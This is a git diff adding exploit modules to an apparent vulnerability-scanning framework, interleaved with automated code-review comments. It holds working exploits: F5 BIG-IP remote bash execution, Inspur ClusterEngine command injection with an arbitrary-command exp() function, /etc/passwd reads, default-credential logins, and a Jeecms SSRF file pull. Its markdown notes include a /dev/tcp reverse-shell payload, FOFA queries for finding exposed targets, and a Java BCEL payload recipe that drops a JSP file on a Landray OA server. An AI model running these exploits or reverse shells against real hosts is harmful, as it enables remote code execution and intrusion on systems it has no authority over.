requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) + + if "output" in r.text and r.status_code==200: + c = json.loads(r.text)["output"] + result['target'] = target + result['poc'] = NAME + result['data'] = c + return result + else: + pass + except Exception as e: + pass + + +if __name__ == '__main__': + poc("https://127.0.0.1/") \ No newline at end of file diff --git a/Moudle/F5/CVE_2021_22986.py b/Moudle/F5/CVE_2021_22986.py new file mode 100644 index 0000000..829a944 --- /dev/null +++ b/Moudle/F5/CVE_2021_22986.py @@ -0,0 +1,41 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import json +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='CVE-2021-22986' +AUTHOR="Joker" +REMARK='F5 BIG-IP 远程代码执行漏洞2' +FOFA_RULE='title="BIG-IP® ;- Redirect"或icon_hash="-335242539"' +###################################################### + +def poc(target): + result = {} + vuln_url = target + "/mgmt/tm/util/bash" + headers = { + "Authorization": "Basic YWRtaW46QVNhc1M=", + "X-F5-Auth-Token": "", + "Content-Type": "application/json" + } + data = '{"command":"run","utilCmdArgs":"-c id"}' + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.post(url=vuln_url, data=data,headers=headers, verify=False, timeout=5) + if "commandResult" in r.text and r.status_code == 200: + c = json.loads(r.text)["commandResult"] + result['target'] = target + result['poc'] = NAME + result['data'] = c + return result + else: + pass + except Exception as e: + pass + + +if __name__ == '__main__': + poc("https://127.0.0.1/") \ No newline at end of file diff --git a/Moudle/Fikker/Fikker_admin.py b/Moudle/Fikker/Fikker_admin.py new file mode 100644 index 0000000..2d9dd4a --- /dev/null +++ b/Moudle/Fikker/Fikker_admin.py 
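Review bot: `"output" in r.text` is a weak signal for a file read — any JSON error document or page containing that word matches, and `json.loads(r.text)["output"]` then raises `KeyError`/`ValueError` straight into `except Exception as e: pass`, which drops it silently. Since the request reads `/etc/passwd`, check the content, e.g. `if r.status_code == 200 and "root:x:0" in r.text:` (the Landray module in this commit does exactly that) and parse the JSON inside that branch. The caught `e` is never used; either log it or write `except requests.RequestException:`. The commented-out reverse-shell URL chain is exploitation, not detection, and would be better placed in a `.md` next to the module than in `poc()`.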
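Review bot: The `Authorization: Basic YWRtaW46QVNhc1M=` header decodes to `admin:ASasS`, an arbitrary credential, and nothing in the file explains that the request is expected to succeed because `X-F5-Auth-Token` is sent empty rather than because of this password, so a reader may take the module for a credential check. A one-line comment on the header, `# placeholder basic creds; the empty X-F5-Auth-Token is what the bypass relies on — confirm`, would make that explicit. `"commandResult" in r.text` should be paired with a check that the output looks like `id` output (`"uid=" in c`) before reporting, to avoid flagging an error document that echoes the field name. As in the sibling module, `except Exception as e: pass` discards the error and `e` is unused.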
@@ -0,0 +1,50 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import json +import requests +from Config.config_requests import ua + +# 脚本信息 +###################################################### +NAME='Fikker_admin' +AUTHOR="Trans" +REMARK='fikker Console default password' +FOFA_RULE='title=="转向 Fikker 管理平台"' +###################################################### + +def poc(target): + result={} + headers ={ + "User-Agent":ua, + "Content-Type":"text/plain;charset=UTF-8", + "Origin": target, + "Referer": target+"/fikker/", + "Accept-Encoding": "gzip, deflate", + "Accept-Language": "en-US,en;q=0.9" + } + + data = { + "RequestID":"LOGIN", + "Username":"admin", + "Password":"123456" + } + + try: + target += "/fikker/webcache.fik?type=sign&cmd=in" + r = requests.post(target ,headers = headers,data = data,verify=False,timeout=40) + if r.status_code == 200 : + text = json.loads(r.text) + if text['Return'] == "True": + result['target'] = target + result['poc'] = NAME + result['username'] = 'admin' + result['password'] = '123456' + return result + except: + pass + + +if __name__ == '__main__': + poc("http://127.0.0.1:6780") + diff --git a/Moudle/Inspur/CVE_2020_21224.md b/Moudle/Inspur/CVE_2020_21224.md new file mode 100644 index 0000000..13b4e0c --- /dev/null +++ b/Moudle/Inspur/CVE_2020_21224.md 
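Review bot: `data` is a plain dict, so `requests` form-encodes it as `RequestID=LOGIN&Username=admin&Password=123456` while the `Content-Type` header claims `text/plain;charset=UTF-8`; the reply is parsed with `json.loads`, which suggests the console speaks JSON, in which case the body should be `data=json.dumps(data)` — confirm against a live console, since the expected body format cannot be read from this file. `target += "/fikker/webcache.fik?..."` mutates the parameter before `result['target'] = target`, so this module reports the endpoint URL where every other module reports the base target; use a separate `url` variable. `timeout=40` is an order of magnitude above the rest of the framework and will dominate batch runtime on dead hosts. `verify=False` is passed but the urllib3 warning is never disabled here, so each HTTPS hit prints an `InsecureRequestWarning`.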
@@ -0,0 +1,76 @@ +# 1、漏洞介绍 +浪潮 ClusterEngineV4.0 任意命令执行 +登录处抓包,然后闭合username字段重发引发报错 +远程攻击者可以将恶意登录数据包发送到控制服务器 +# 2、漏洞版本 +浪潮ClusterEngine V4.0 +# 3、fofa搜索 +title="TSCEV4.0" +# 4、漏洞利用 + +``` +# POC测试(出现 root:x:0:0 则存在漏洞) + +op=login&username=Wings`$(cat /etc/passwd)` +{"err":"/bin/sh: root:x:0:0:root:/root:/bin/bash: No such file or directory\n","exitcode":1,"out":"the user Wings does not exist\nerror:1\n"} + +# 反弹shell +op=login&username=Wings`$(bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}}%2F{PORT}%200%3E%261)` +``` + +登陆闭合字段username、执行命令并没有成功 +``` +POST /login HTTP/1.1 +Host: 127.0.0.1:8443 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 60 +Origin: https://127.0.0.1:8443 +Connection: close +Referer: https://127.0.0.1:8443/module/login/login.html +Cookie: lang=cn + +op=login&username=admin'ping xxxxxx.dnslog.cn&password=admin + +HTTP/1.1 200 +Content-Type: text/json;charset=utf-8 +Date: Tue, 13 Apr 2021 06:40:42 GMT +Connection: close +Content-Length: 159 + +{"err":"/bin/sh: -c: line 0: unexpected EOF while looking for matching `''\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n","exitcode":1,"out":""} +``` + + + +按照漂亮鼠星球思路可以,未做过滤,通过;可拼接命令 +``` +POST /alarmConfig HTTP/1.1 +Host: 127.0.0.1:8443 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 55 +Origin: https://127.0.0.1:8443 +Connection: close +Referer: 
https://127.0.0.1:8443/module/login/login.html +Cookie: lang=cn + +op=testPhone&alarmTestPhone=1;whoami&alarmTestMessage=2 + + +HTTP/1.1 200 +Content-Type: text/json;charset=utf-8 +Date: Tue, 13 Apr 2021 06:52:47 GMT +Connection: close +Content-Length: 1459 + +{"def":"root","erInfo":"./lt-gnokii: line 199: cd: /mnt/hgfs/share/alarm/ex_alarm_tstor/gnokii/gnokii-0.6.31/gnokii: No such file or directory\ngcc: error: gnokii-gnokii.o: No such file or directory\ngcc: error: gnokii-gnokii-calendar.o: No such file or directory\ngcc: error: gnokii-gnokii-dial.o: No such file or directory\ngcc: error: gnokii-gnokii-file.o: No such file or directory\ngcc: error: gnokii-gnokii-logo.o: No such file or directory\ngcc: error: gnokii-gnokii-mms.o: No such file or directory\ngcc: error: gnokii-gnokii-monitor.o: No such file or directory\ngcc: error: gnokii-gnokii-other.o: No such file or directory\ngcc: error: gnokii-gnokii-phonebook.o: No such file or directory\ngcc: error: gnokii-gnokii-profile.o: No such file or directory\ngcc: error: gnokii-gnokii-ringtone.o: No such file or directory\ngcc: error: gnokii-gnokii-security.o: No such file or directory\ngcc: error: gnokii-gnokii-settings.o: No such file or directory\ngcc: error: gnokii-gnokii-sms.o: No such file or directory\ngcc: error: gnokii-gnokii-todo.o: No such file or directory\ngcc: error: gnokii-gnokii-utils.o: No such file or directory\ngcc: error: gnokii-gnokii-wap.o: No such file or directory\ngcc: error: ../common/.libs/libgnokii.so: No such file or directory\ngcc: error: ../getopt/libgetopt.a: No such file or directoryn","cmd":"cd /var/tsced/tools/;./lt-gnokii --config ../config/sms.cf --dialvoice 1;whoami","status":"ok","info":"测试成功"} +``` diff --git a/Moudle/Inspur/CVE_2020_21224.py b/Moudle/Inspur/CVE_2020_21224.py new file mode 100644 index 0000000..1c8a85f --- /dev/null +++ b/Moudle/Inspur/CVE_2020_21224.py 
@@ -0,0 +1,67 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ +import json +import requests +from Config.config_requests import ua + +requests.packages.urllib3.disable_warnings() + +# 脚本信息 +###################################################### +NAME='CVE_2020_21224' +AUTHOR="RabbitMask" +REMARK='Inspur ClusterEngine V4.0 RCE' +FOFA_RULE='title="TSCEV4.0"' +###################################################### + +def poc(target): + result={} + headers={ + 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', + 'X-Requested-With':'XMLHttpRequest', + "User-Agent":ua + } + + data = { + 'op':'testPhone', + 'alarmTestPhone':'1;{}'.format('whoami'), + 'alarmTestMessage':'2' + } + + try: + r = requests.post(target+"/alarmConfig",headers=headers, data=data, verify=False) + res=json.loads(r.text) + if res['def']: + result['target'] = target + result['poc'] = NAME + result['whoami'] = str(res['def']) + return result + except: + pass + + + +def exp(target,cmd): + headers={ + 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', + 'X-Requested-With':'XMLHttpRequest', + "User-Agent":ua + } + + data = { + 'op':'testPhone', + 'alarmTestPhone':'1;{}'.format(cmd), + 'alarmTestMessage':'2' + } + + try: + r = requests.post(target+"/alarmConfig",headers=headers, data=data, verify=False) + res=json.loads(r.text) + print(res['def']) + except: + pass + + + +if __name__ == '__main__': + exp("http://127.0.0.1","whoami") \ No newline at end of file diff --git a/Moudle/Inspur/Inspur_Any_user_login.py b/Moudle/Inspur/Inspur_Any_user_login.py new file mode 100644 index 0000000..e2652c9 --- /dev/null +++ b/Moudle/Inspur/Inspur_Any_user_login.py 
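Review bot: Both `requests.post` calls omit `timeout`, so a single unresponsive host hangs the batch; add `timeout=5` to match the other Inspur modules. `res['def']` is only truthy-checked, and a missing key or a non-JSON reply goes straight into the bare `except: pass` with no trace; narrow it to `except (requests.RequestException, ValueError, KeyError):` so a real bug in the response handling is not hidden. `exp()` is a copy of `poc()` differing only in the injected command and where the output goes; one `_run(target, cmd)` helper returning `res['def']` removes the duplication and keeps the two request shapes in sync.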
@@ -0,0 +1,36 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import sys +import requests +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# 脚本信息 +###################################################### +NAME='Inspur_Any_user_login' +AUTHOR="Faith" +REMARK='浪潮任意用户登录漏洞' +FOFA_RULE='title="TSCEV4.0"' +###################################################### + +def poc(target): + url = target + "/module/login/login.html" + result = {} + headers = {"User-Agent":ua} + data = "op=login&username=admin|pwd&password=任意" + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.post(url,data=data,headers=headers,verify=False,timeout=3) + if r.status_code == 200: + result['target'] = target + result['poc'] = NAME + result['url'] = url + return result + else: + pass + except: + pass + +if __name__ == '__main__': + poc("https://127.0.0.1:8443/") \ No newline at end of file diff --git a/Moudle/Inspur/Inspur_sysShell_RCE.py b/Moudle/Inspur/Inspur_sysShell_RCE.py new file mode 100644 index 0000000..342467c --- /dev/null +++ b/Moudle/Inspur/Inspur_sysShell_RCE.py 
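Review bot: `if r.status_code == 200:` is the only evidence `poc()` uses, but the request is a POST to `/module/login/login.html`, a static page that will answer 200 regardless of whether `admin|pwd` logged anyone in, so every reachable TSCEV4.0 host will be reported as vulnerable. Check for something only a successful login produces — a session cookie in `r.cookies`, a redirect, or a success marker in the body — and store it in the result; the accompanying .md shows the real login handler is `POST /login` returning JSON, which is probably the endpoint to probe (confirm). The `password=任意` body is non-ASCII and will be sent UTF-8-encoded; an ASCII placeholder avoids surprises on a server expecting GBK. `import sys` is unused.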
@@ -0,0 +1,38 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from requests.packages.urllib3.exceptions import InsecurePlatformWarning + + +# 脚本信息 +###################################################### +NAME='Inspur_sysShell_RCE' +AUTHOR="Faith" +REMARK='浪潮ClusterEngineV4.0 sysShell RCE' +FOFA_RULE='title="TSCEV4.0"' +###################################################### + +def poc(target): + result = {} + url = target + "/sysShell" + headers = { + "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", + "Cookie": "lang=cn" + } + data = "op=doPlease&node=cu01&command=cat /etc/passwd" + try: + requests.packages.urllib3.disable_warnings(InsecurePlatformWarning) + r = requests.post(url=url,headers=headers,data=data,verify=False,timeout=3) + if 'root' in r.text and r.status_code ==200: + result['target'] = target + result['poc'] = NAME + result['url'] = url + return result + else: + pass + except: + pass +if __name__ == '__main__': + poc("https://127.0.0.1/") + diff --git a/Moudle/Jeecms/Jeecms_ssrf_getshell.md b/Moudle/Jeecms/Jeecms_ssrf_getshell.md new file mode 100644 index 0000000..efa7020 --- /dev/null +++ b/Moudle/Jeecms/Jeecms_ssrf_getshell.md 
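Review bot: `'root' in r.text` is too loose a marker for a `cat /etc/passwd` read — any error page mentioning "root" passes, and combined with `r.status_code == 200` this will produce false positives; use `"root:x:0" in r.text` as the Landray module does. `InsecurePlatformWarning` is imported and disabled, but the warning that `verify=False` actually raises is `InsecureRequestWarning`, so each HTTPS hit still prints a warning; swap the import. `node=cu01` is a hard-coded node name that may not exist on other clusters; expose it as a parameter with `cu01` as the default. No `User-Agent` is set here while the rest of the framework sends `ua` from `Config.config_requests`.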
@@ -0,0 +1,57 @@ +# 1、漏洞描述 + +jeecms V7版本的一个上传组件存在远程拉取图片的功能,并将远程拉取的文件保存在服务器上。但程序没有对远程文件的类型做好过滤,导致可从远程拉取任意格式的文件,可直接getshell。 + +V9版本做了修复,会对远程获取的文件后缀进行校验,并对上传的文件强行重命名。 + +# 2、漏洞复现 + +直接上POST包: + +data数据中远程文件的后缀写为.jsp?.jpg是尝试绕过,虽然这样能上传上去,但是因强行文件重命名,传上去的也是一个图片。可直接尝试不带?.jpg去检查和利用。 + +``` +POST /ueditor/getRemoteImage.jspx HTTP/1.1 +Host: 127.0.0.1 +Content-Length: 453 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Google Chrome";v="93", " Not;A Brand";v="99", "Chromium";v="93" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +Origin: null +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZUxAA9jVG2OHOQYo +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: cross-site +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close + +------WebKitFormBoundaryZUxAA9jVG2OHOQYo +Content-Disposition: form-data; name="upfile" + +http://vps:port/test1.jsp?.jpg +------WebKitFormBoundaryZUxAA9jVG2OHOQYo +Content-Disposition: form-data; name="mark" + + +------WebKitFormBoundaryZUxAA9jVG2OHOQYo +Content-Disposition: form-data; name="uploadfile"; filename="test1.jsp.jpg" +Content-Type: application/octet-stream + +<%out.println("123");%> +------WebKitFormBoundaryZUxAA9jVG2OHOQYo-- + +``` + +网站返回json格式的包含 远程图片抓取成功 以及url地址则证明存在漏洞 + +# 3、poc + +因SSRF漏洞利用需要从远端获取信息,若要getshell,需要远端存在shell文件,所以poc需要修改poc_content方法中content参数里的url地址。 + +脚本中有个坑,post内容里的回车换行,这里用的\r\n表示的,直接回车换行请求会出问题,导致poc验证失败。 diff --git a/Moudle/Jeecms/Jeecms_ssrf_getshell.py b/Moudle/Jeecms/Jeecms_ssrf_getshell.py new file mode 100644 index 0000000..0eddb9c --- /dev/null +++ b/Moudle/Jeecms/Jeecms_ssrf_getshell.py 
@@ -0,0 +1,46 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +import requests.packages.urllib3 +from Config.config_requests import ua +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + +# 脚本信息 +###################################################### +NAME='Jeecms_ssrf_getshell' +AUTHOR="境心" +REMARK='Jeecms ssrf漏洞' +FOFA_RULE='app="JEECMS"' +###################################################### + +def poc_content(): + content = """-----------------------------245629485030790359921083390342\r\nContent-Disposition: form-data; name="upfile"\r\n\r\nhttp://127.0.0.1:9699/test1.jsp\r\n-----------------------------245629485030790359921083390342--""" + return content + +def poc(targrt): + result = {} + url = targrt + "/ueditor/getRemoteImage.jspx" + content = poc_content() + headers = { + "User-Agent":ua, + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept - Encoding": "gzip, deflate", + "Content-Type": "multipart/form-data; boundary=---------------------------245629485030790359921083390342", + "Connection": "close" + } + res = requests.post(url, headers=headers, data=content, timeout=5, verify=False) + res = res.text + print(res) + if "srcUrl" in res and "远程图片抓取成功" in res: + result['message'] = res + result['target_url'] = url + return result + +if __name__ == '__main__': + # poc调用 + poc("https://127.0.0.1") \ No newline at end of file diff --git a/Moudle/Kangle/Kangle_Console_default_password.py b/Moudle/Kangle/Kangle_Console_default_password.py new file mode 100644 index 0000000..feef1da --- /dev/null +++ b/Moudle/Kangle/Kangle_Console_default_password.py 
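Review bot: `print(res)` in `poc()` dumps the full response body of every probed host to stdout, which floods the console in a batch run and looks like a debugging leftover; drop it and put what matters into `result`. The header name `"Accept - Encoding"` (with spaces) is not `Accept-Encoding`; `requests` will emit it as a malformed header that servers ignore or reject, so fix the spelling. The SSRF callback is hard-coded to `http://127.0.0.1:9699/test1.jsp` inside `poc_content()`, so the shipped module cannot fire against a real target until edited — make the callback URL a parameter or read it from `Config`. There is no `try/except` around the request, so a connection error propagates out of `poc()` unlike the other modules, and the parameter is misspelled `targrt`.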
@@ -0,0 +1,44 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import ua + +requests.packages.urllib3.disable_warnings() + +# 脚本信息 +###################################################### +NAME = 'Kangle_Console_default_password' +AUTHOR = "RabbitMask" +REMARK = 'kangle Console default password' +FOFA_RULE = 'app="kangle-easypanel"' +###################################################### + +def poc(target): + result={} + headers = { + "User-Agent": ua, + 'Content-Type': 'application/x-www-form-urlencoded', + } + + data = { + "username": "admin", + "passwd": "kangle", + } + + try: + r = requests.post(target + "/admin/index.php?c=session&a=login", headers=headers, data=data, verify=False, timeout=5,allow_redirects=False) + if r.status_code==302: + result['target'] = target + result['poc'] = NAME + result['url'] = target+'/admin/index.php?c=session&a=login' + result['username'] = 'admin' + result['password'] = 'kangle' + return result + except: + pass + + + +if __name__ == '__main__': + poc("http://127.0.0.1:3312") diff --git a/Moudle/Landray/Landray_OA_anyfile_read.py b/Moudle/Landray/Landray_OA_anyfile_read.py new file mode 100644 index 0000000..24502dc --- /dev/null +++ b/Moudle/Landray/Landray_OA_anyfile_read.py 
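Review bot: The bare `except: pass` at the end of `poc()` swallows every exception, including `KeyboardInterrupt` and programming errors such as a `NameError`, so a broken module silently reports "not vulnerable"; narrow it to `except requests.RequestException: pass` (or log the exception). The same pattern appears in Landray_OA_anyfile_read.py, CNVD_2019_19299.py, CNVD_2020_62422.py, CNVD_2021_01627.py and Information_seeyou.py, and CVE_2021_3019.py has the equivalent `except Exception as e: pass` with an unused `e`. On the non-vulnerable path `poc()` falls off the end and returns `None`, while Jeecms_ssrf_getshell.py returns `{}`; callers need one convention, so end the function with an explicit `return None` (or `return result`) and document which one the framework expects.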
@@ -0,0 +1,37 @@ +#!/usr/bin/env python3 +# _*_ coding:utf-8 _*_ + +import requests +from Config.config_requests import headers +from requests.packages.urllib3.exceptions import InsecureRequestWarning + + +######################################################################################################################## +# 脚本信息 +NAME='Landray_OA_anyfile_read' +AUTHOR="Faith" +REMARK='蓝凌OA custom.jsp 任意文件读取漏洞' +FOFA_RULE='app="Landray-OA系统"' +######################################################################################################################## + +def poc(target): + result={} + url = target + "/sys/ui/extend/varkind/custom.jsp" + data = 'var={"body":{"file":"file:///etc/passwd"}}' + # data = 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}' + try: + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + r = requests.post(url=url,headers=headers,data=data,verify=False,timeout=3) + if r.status_code == 200 and "root:x:0" in r.text: + result["target"] = target + result["poc"] = NAME + result["url"] = url + return result + else: + pass + except: + pass + +if __name__ == '__main__': + poc("http://127.0.0.1/") + diff --git a/Moudle/Landray/Landray_OA_xmldecoder_getshell.md b/Moudle/Landray/Landray_OA_xmldecoder_getshell.md new file mode 100644 index 0000000..98747e4 --- /dev/null +++ b/Moudle/Landray/Landray_OA_xmldecoder_getshell.md 
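Review bot: The `else: pass` after the status check in `poc()` is a no-op and the commented-out `# data = 'var=...admin.properties...'` line is dead code; delete both (CVE_2021_3019.py carries the same `else: pass`). `requests.packages.urllib3.disable_warnings(InsecureRequestWarning)` is process-wide configuration; calling it inside `poc()` on every invocation works but belongs at import time, where the other modules place it.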
@@ -0,0 +1,114 @@ +# 1、漏洞描述 + +蓝凌OA部分版本存在漏洞,前台即可实现RCE命令执行,直接getshell。 + +# 2、漏洞复现 + +# 2.1、生成payload + +需要运行两段java代码,生成payload。 + +FastJsonEchoBCEL.java + +更改shell变量的内容即可,将exp BASE64加密后替换(这里jdk要用低版本,否则无法导入BASE64Decoder包,貌似用jdk1.7、jdk1.8均可); + +```java +import java.io.PrintWriter; +import sun.misc.BASE64Decoder; + +public class FastJsonEchoBCEL { + public FastJsonEchoBCEL() throws Exception { + } + + public static void main(String[] args) throws Exception { + new FastJsonEchoBCEL(); + } + + static { + try { + Class cls=Thread.currentThread().getContextClassLoader().loadClass("bsh.Interpreter"); + String path=cls.getProtectionDomain().getCodeSource().getLocation().getPath(); + PrintWriter printWriter2 = new PrintWriter(path.split("WEB-INF")[0] + "login_test.jsp"); + String shell = "PCVvdXQucHJpbnRsbigidGhpcyBpcyBhIGZyaWVuZGx5IHRlc3QsIFBsZWFzZSBjaGVjayBhbmQgcmVwYWlyIHZ1bG5lcmFiaWxpdGllcy4iKTslPg=="; + BASE64Decoder decoder = new BASE64Decoder(); + String decodeString = new String(decoder.decodeBuffer(shell), "UTF-8"); + printWriter2.println(decodeString); + printWriter2.close(); + } catch (Exception var5) { + } + + } +} +``` + +main.java + +这里需要使用maven导入org.apache.bcel包,具体方法见下面; + +``` +import org.apache.bcel.Repository; +import org.apache.bcel.classfile.JavaClass; +import org.apache.bcel.classfile.Utility; +import java.io.IOException; + +public class main { + + public static void main(String[] args) throws ClassNotFoundException, IOException { + JavaClass javaClass = Repository.lookupClass(FastJsonEchoBCEL.class); + String codes = Utility.encode(javaClass.getBytes(), true); + System.out.println("$$BCEL$$"+codes); + + } + +} +``` + +关于这两段代码如何运行,建议使用idea软件。本地新建一个文件夹,右键以idea的project方式打开。 + +在idea软件中,右键该名称的项目文件夹,新建-->新模块,选择Maven,点下一步,点完成创建成功。 + +将上面两端代码复制到本地文件中,文件名要与上面写的一样,然后两个文件复制到创建的src/main/java目录下。 + +打开pom.xml,将如下内容复制到文件中 + +``` + + + + org.apache.bcel + bcel + 5.2 + + +``` + +![](image-20210913144734740.png) + +文件-->项目结构-->项目中,选择相应的jdk版本,然后执行main.java即可得到payload。 + 
+# 2.2、漏洞验证 + +POST: + +将如上得到的payload替换下面标签内的内容即可。 + +``` +POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 +Host: 127.0.0.1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Length: 2907 + +var={"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=editParam"}}&fdParemNames=11&fdParameters=$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$dbV$dbF$U$dd$D62B$E0$98KHI$934$N$Q$c0$N$974$e5$da$d8$60c0$E0$d8$b1iKeY$d8rdI$95d$Ci$ff$a7$cfy1$5de$ad$7e$40$7f$a8o$5d$3d$psu$dd$8b$d7$d2$5c$ce$ec$d9$3ag$9f$99$p$ff$fe$e7$af$bf$B$98$c5O$o$kbA$c0$a2$88$W$y$88X$c22oV$C$f8Z$c4kDDD$b1$wb$N1$Rq$ac$8bH$60C$c0$a6$80$a4$88N$y$E$b0$rb$Q$db$7c$f2$s$80$j$de$ef$8a$90$b0$X$40J$c0$be$88$7e$ce$7e$c0$fbt$A$Z$O$7e$cb$d7$b3$bc$c9$J8$U$f0$NC$db$a2fh$ee2C$eb$e8X$9a$c1$X5$L$wCWR3$d4$edj$r$af$da$fbr$5e$tK0i$w$b2$9e$96m$8d$cf$_$8d$3e$b7$a49$MO$93$8e$ad$84$x$b2f$84$cb$f2$89$ivU$c7$N$c7d$c7$ddpLcM$v$99$91$e8Zr$81A$5c$3bUT$cb$d5L$836$f98$9e$a1$7f$f40$e9m$d2e$a3$YN$b9$b6f$U$X$3cOd$bbH$b0$de$s$cb$M$81EE$bf$f2$5b$d1$J$d6s$L$V$d5e$c7$n$90$cf$92$dd$S$f7$bc$J$81d$d1$c0$cd$d8$9a$ab$da$d3$M$a1$3aF3$c3$3b7v$82$f9$9d$92$aa$eb$MBAUH$Y$9ba0$e9T$8dpEs$94p$e4uj$ed$e5$ecj$7d$85s$d6A$f5w0t$a6$5cYy$b7$r$5b$9eX$a47$J$902$ab$b6$a2$c64$$$5e$a8Q$a1$v$ee$83$84O$f1$88$e1$c9$ffPT$c0$b7$S$be$c3$91$84$ef$nS$ce$f2Ni$wa$90$e3$96$adR$x$m$_AAA$80$w$e1$YE$B$r$J$g$ca$C$deI$d0Q$R$60H0a$91$c6M$82g$Yh$94$zR$d5tO$D$n$b3$W$99Ll$c7$q$fc$A$5b$82$D$97$e1$9en$W5$e3H$d7$iw$aa$ecX$S$aa$b0x$y$t$M$eeN4$7dRx$bb$5bU$d67$ac$bc$b1$e7$e4$b5$a2V$88$97$y$e5$y$c2$9fR$o$9e$3b$933$e9j$$$7e$3a$97X$df$d3$95$99$5d$t$R$8b8$b9L$ecC$$$V$v$cb$f1tY$s$5c$be$b2$5bT$w$e9$f7$d9$8c$7e$96X$
cf$bd$c8$c7$e7t$a5$S$d3$e4$cc$a9U$88$eb$bar6$abm$ee$3b$faNqi$89NV$f3D1t7$G$s$e1$3dN$v$d9$H$fb$b1$c9W$dc$e93$J$lp$o$e1G$9e$8a$de$h$f8$f5$f9$bdC$f2$s_V$V$f7$8ei$bfd$abr$81$ce$80R$b5m$d5p$af$e6$7d$a3c$c9F$U$9d$9cPQu$a3$s$a5$ee$d4$f5$Oo$d2$94$3dO$87$ee$c0o$z$f1$3dM$X$Y$dau$gx$W$ba$98$a3M$eeV$93$9b$d2$d5$60$a2$a0$c9$a3$j$dbt$v0$Kw$d5$ac_$d6$c7W$fe8$w$F$a6$b9g$e1F$M$91$8d$fc$3b$82D$f1$a2$a5$8b$e2$5d$G$86$H$7fc$bdY$r$be$c1$7fZc$e8$m$s$5e$97$$Sr$c5c$a8n$f8$60$8fW$i$e9$f6$9c$O$$$8f$ca$x$Kw$Tq$5d$W$fc$8e$a5k$94$cag$cd$84kZ$89$dad$cbR$NJ$ed$e4$7fh$7d$e7$O$f1$S$e6$9aW$95$o$d4lk$fa$ba$a0D$aa$c7$c7$3c$b3$fdM$9d$8a$d0M$j$3d$8c4g$Q$bc2$a7$938$7eE7$j$V$8f$e8$5b$f3$Q$fc$d7$K$c6K$N$cd$l$d3l$86f$8cz$ff$f89$d8G$g$b4$e0$J$b5$fc$d3$E$I$f0$n$80$cfh$q$d5Ax$8a$cf$a9$7fF$8f$8f$y$ph$c7$u$c6$$$a9$be$a4$9e$a3$da$_$d0$92$3dGk$a6$91$ae$83$c8$a4$5bt$ed$Y$c7$f3$3bt$BL$90g$8c$d3$b1Vz$5d$h$ad$94$7e$81$af$G$7f$b0$ad$Gas$bc$86$40$N$ed5$885t$q$_$me$_$d0I$_$bb$f7$3c$d8UCw$ebt$N$3d$c1$m55$f4$9e$a3o$x$Y$da$be$40$3f$B$G$e6$7d$X$Y$cc$O$f9$sk$Y$K$de$3f$c7$f0$bc$7fb$c8_$c3$83$89$g$3e$f9$Z$be$cd$8f$9eO$KU$cc$R$d2$88$7b$3dE$k$D$dd$e4m$P$ee$p$88E$f4b$F$7dXG$IY$fa$ba$k